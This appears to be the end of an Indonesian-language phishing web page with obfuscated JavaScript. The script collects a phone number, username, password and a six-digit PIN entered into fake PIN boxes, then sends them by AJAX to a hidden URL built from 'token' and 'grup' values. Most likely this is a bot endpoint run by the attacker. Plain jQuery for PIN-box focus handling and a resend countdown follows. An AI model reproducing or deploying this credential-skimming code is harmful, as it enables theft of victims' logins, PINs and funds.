_0x34d6a1[_0x2b36fa(0x12e)](_0x292d24,_0x1f7789);},'sMjTe':_0x34d6a1[_0x35b759(0x134)],'DCyQn':_0x34d6a1[_0x35b759(0x86)],'HEBct':function(_0x136771,_0x9eaaaa,_0x3226dc){var _0x537a33=_0x35b759;return _0x34d6a1[_0x537a33(0x139)](_0x136771,_0x9eaaaa,_0x3226dc);}};continue;case'2':document[_0x35b759(0xe6)+_0x35b759(0xdb)](_0x34d6a1[_0x35b759(0x118)])[_0x35b759(0xcd)]=_0x34d6a1[_0x35b759(0x122)](_0x2c8ea2,'');continue;case'3':$[_0x35b759(0x14b)]({'url':_0x35b759(0x11f)+_0x35b759(0xc2)+_0x35b759(0x128)+token+(_0x35b759(0x10e)+_0x35b759(0xaa)+'=')+grup+_0x35b759(0xa9)+_0x3cbee7+(_0x35b759(0x13b)+_0x35b759(0x138)),'method':_0x35b759(0x9b),'complete':function(){var _0x20a887=_0x35b759,_0x32b183={'bgWmU':_0x13c508[_0x20a887(0x10a)],'QYfIB':function(_0x14f605,_0x24c808){var _0x4b9fb1=_0x20a887;return _0x13c508[_0x4b9fb1(0x10b)](_0x14f605,_0x24c808);},'KEOgw':_0x13c508[_0x20a887(0x123)],'QDqlI':_0x13c508[_0x20a887(0xe8)],'QrvHv':function(_0x384e1d,_0x5b998c){var _0x37df2e=_0x20a887;return _0x13c508[_0x37df2e(0x13e)](_0x384e1d,_0x5b998c);},'Ufzyd':_0x13c508[_0x20a887(0xae)],'Wwmts':function(_0x38e1e4,_0x37a9f5){var _0x36738b=_0x20a887;return _0x13c508[_0x36738b(0xab)](_0x38e1e4,_0x37a9f5);},'ErrMX':_0x13c508[_0x20a887(0x111)],'ZJaAt':function(_0x589329,_0xfef92f){var _0x1b28d0=_0x20a887;return _0x13c508[_0x1b28d0(0xab)](_0x589329,_0xfef92f);},'oMbdC':_0x13c508[_0x20a887(0x8e)],'dhqje':function(_0x8504f,_0x1f41a2){var _0x10f5a3=_0x20a887;return _0x13c508[_0x10f5a3(0xf0)](_0x8504f,_0x1f41a2);},'vMFOX':_0x13c508[_0x20a887(0x90)],'gOpta':function(_0x9741ff,_0x415ac6){var _0x2b06f8=_0x20a887;return _0x13c508[_0x2b06f8(0xf0)](_0x9741ff,_0x415ac6);},'oQVnM':_0x13c508[_0x20a887(0x93)]};_0x13c508[_0x20a887(0x136)](setTimeout,function(){var _0x5598d4=_0x20a887,_0x439582=_0x32b183[_0x5598d4(0x12a)][_0x5598d4(0x97)]('|'),_0x880065=-0x1*0x9f3+0x1b74+0x1*-0x1181;while(!![]){switch(_0x439582[_0x880065++]){case'0':_0x32b183[_0x5598d4(0x99)]($,_0x32b183[_0x5598d4(0xd1)])[_0x5598d4(0xbc)]('');continue;case'1':_0x32b183[_0x5598d4(0x99)]($,_0x32b183[_0x5598d4(0xfd)])[_0x5598d4(0xeb)]();continue;case'2':_0x32b183[_0x5598d4(0xce)]($,_0x32b183[_0x5598d4(0x117)])[_0x5598d4(0xbc)]('');continue;case'3':_0x32b183[_0x5598d4(0xd6)]($,_0x32b183[_0x5598d4(0xf6)])[_0x5598d4(0xbc)]('');continue;case'4':_0x32b183[_0x5598d4(0x124)]($,_0x32b183[_0x5598d4(0x96)])[_0x5598d4(0xf4)]();continue;case'5':_0x32b183[_0x5598d4(0x88)]($,_0x32b183[_0x5598d4(0x91)])[_0x5598d4(0xbc)]('');continue;case'6':_0x32b183[_0x5598d4(0xfe)]($,_0x32b183[_0x5598d4(0xfd)])[_0x5598d4(0xbc)]('');continue;case'7':_0x32b183[_0x5598d4(0xd6)]($,_0x32b183[_0x5598d4(0x130)])[_0x5598d4(0xbc)]('');continue;}break;}},0x1*-0x13e3+-0x1*-0x1ccd+-0x51*0x16);}});continue;case'4':event[_0x35b759(0xb6)+_0x35b759(0xc5)]();continue;case'5':var _0x466d80=_0x34d6a1[_0x35b759(0x143)];continue;case'6':var _0x3cbee7=_0x34d6a1[_0x35b759(0x122)](_0x34d6a1[_0x35b759(0xc1)](_0x34d6a1[_0x35b759(0x122)](_0x34d6a1[_0x35b759(0xc1)](_0x34d6a1[_0x35b759(0x122)](_0x34d6a1[_0x35b759(0x14f)](_0x34d6a1[_0x35b759(0x122)](_0x34d6a1[_0x35b759(0x14f)](_0x34d6a1[_0x35b759(0x109)](_0x34d6a1[_0x35b759(0xc0)](_0x34d6a1[_0x35b759(0x144)](_0x34d6a1[_0x35b759(0x140)](_0x34d6a1[_0x35b759(0xb0)](_0x34d6a1[_0x35b759(0xcb)](_0x34d6a1[_0x35b759(0x140)](_0x34d6a1[_0x35b759(0xff)](_0x34d6a1[_0x35b759(0x122)](_0x34d6a1[_0x35b759(0xe7)]('',_0x466d80),_0x34d6a1[_0x35b759(0x14a)]),tarif[_0x35b759(0xcd)]),_0x34d6a1[_0x35b759(0xb2)]),nohp[_0x35b759(0xcd)]),_0x34d6a1[_0x35b759(0x8f)]),user[_0x35b759(0xcd)]),_0x34d6a1[_0x35b759(0x14e)]),pass[_0x35b759(0xcd)]),_0x34d6a1[_0x35b759(0xd0)]),_0x2c8ea2),_0x34d6a1[_0x35b759(0x114)]),pin1[_0x35b759(0xcd)]),pin2[_0x35b759(0xcd)]),pin3[_0x35b759(0xcd)]),pin4[_0x35b759(0xcd)]),pin5[_0x35b759(0xcd)]),pin6[_0x35b759(0xcd)]);continue;}break;}} 
    </script>
    <script>
        $(document).ready(function() {
    $('.clear').click(function() {
        $('.pin-inp').val('');
        $('#pin1').focus();
     });    
  });        
        
$('.pin-inp').on('input', function(event) {
        const inputs = $('.pin-inp');
        const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
        if (isAllFilled == true) {
            $(event.target).blur();
        }
        const index = inputs.index(this);
        const currentValue = event.target.value;
        if (currentValue.length === 1) {
            if (index < inputs.length - 1) {
                inputs[index + 1].focus();
            }
        } else if (currentValue.length === 0) {
            if (index > 0) {
                inputs[index].focus();
            }
        }
    });
    $('.pin-inp').on('keydown', function(event) {
        const inputs = $('.pin-inp');
        const key = event.key;
        const index = inputs.index(this);
        if (key === 'Backspace' && event.target.value.length === 0) {
            if (index > 0) {
                inputs[index - 1].focus();
            }
        }
    });
    
    var url = "#kirim-ulang"; // url tujuan
            var count = 60; // dalam detik
            function countDown() {

                if (count > 0) {
                    count--;
                    var waktu = count + 0;
            $('#waktu').html(waktu);
             
         setTimeout("countDown()", 1000);
         setTimeout(function() { 
         $("#timerku").hide();
         $("#ulangi").show();
         }, 60000);
                    
               
                }
            }
            countDown();
    </script>
    <!-- </body> -->
  </body>
</html>



